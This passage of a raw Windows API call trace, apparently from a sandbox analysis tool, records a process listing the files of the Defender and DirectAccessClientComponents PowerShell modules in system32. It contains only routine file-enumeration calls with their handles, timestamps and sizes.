dwReserved1=0x0, cFileName="Defender.psd1", cAlternateFileName="")) returned 1 [0176.906] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpComputerStatus.cdxml", cAlternateFileName="")) returned 1 [0176.906] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8f67, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpPreference.cdxml", cAlternateFileName="")) returned 1 [0176.906] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x71d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpScan.cdxml", cAlternateFileName="")) returned 1 [0176.906] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x70d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpSignature.cdxml", cAlternateFileName="")) returned 1 [0176.907] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x597, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreat.cdxml", cAlternateFileName="")) returned 1 [0176.907] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreatCatalog.cdxml", cAlternateFileName="")) returned 1 [0176.907] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x39d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreatDetection.cdxml", cAlternateFileName="")) returned 1 [0176.907] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpWDOScan.cdxml", cAlternateFileName="")) returned 1 [0176.907] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpWDOScan.cdxml", cAlternateFileName="")) returned 0 [0176.908] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0176.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0176.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0176.909] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1")) returned 0x20 [0176.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.910] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents", lpFilePart=0x0) returned 0x4f [0176.910] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\", lpFilePart=0x0) returned 0x50 [0176.910] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0176.912] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.913] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa3b30d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa3b30d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa3b30d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents.psd1", cAlternateFileName="")) returned 1 [0176.913] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f81, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.cdxml", cAlternateFileName="")) returned 1 [0176.913] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8bd, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.format.ps1xml", cAlternateFileName="")) returned 1 [0176.913] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa877b6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa877b6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa877b6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2af, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.types.ps1xml", cAlternateFileName="")) returned 1 [0176.913] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3f30, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.cdxml", cAlternateFileName="")) returned 1 [0176.914] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x776, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.format.ps1xml", cAlternateFileName="")) returned 1 [0176.914] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.types.ps1xml", cAlternateFileName="")) returned 1 [0176.914] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.types.ps1xml", cAlternateFileName="")) returned 0 [0176.914] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0176.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.915] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.915] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents", lpFilePart=0x0) returned 0x4f [0176.915] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\", lpFilePart=0x0) returned 0x50 [0176.915] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0176.916] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.916] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa3b30d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa3b30d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa3b30d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents.psd1", cAlternateFileName="")) returned 1 [0176.917] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f81, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.cdxml", cAlternateFileName="")) returned 1 [0176.917] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8bd, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.format.ps1xml", cAlternateFileName="")) returned 1 [0176.917] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa877b6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa877b6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa877b6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2af, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.types.ps1xml", cAlternateFileName="")) returned 1 [0176.917] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3f30, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.cdxml", cAlternateFileName="")) returned 1 [0176.917] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x776, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.format.ps1xml", cAlternateFileName="")) returned 1 [0176.917] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.types.ps1xml", cAlternateFileName="")) returned 1 [0176.918] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0176.918] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0176.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.919] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents", lpFilePart=0x0) returned 0x4f [0176.919] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0176.919] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\directaccessclientcomponents"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0176.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0176.919] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0176.919] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents", lpFilePart=0x0) returned 0x4f [0176.919] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\", lpFilePart=0x0) returned 0x50 [0176.919] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0176.920] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.921] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa3b30d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa3b30d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa3b30d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents.psd1", cAlternateFileName="")) returned 1 [0176.921] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f81, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.cdxml", cAlternateFileName="")) returned 1 [0176.921] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8bd, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.format.ps1xml", cAlternateFileName="")) returned 1 [0176.921] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa877b6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa877b6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa877b6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2af, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.types.ps1xml", cAlternateFileName="")) returned 1 [0176.921] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3f30, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.cdxml", cAlternateFileName="")) returned 1 [0176.921] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x776, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.format.ps1xml", cAlternateFileName="")) returned 1 [0176.922] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.types.ps1xml", cAlternateFileName="")) returned 1 [0176.922] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, 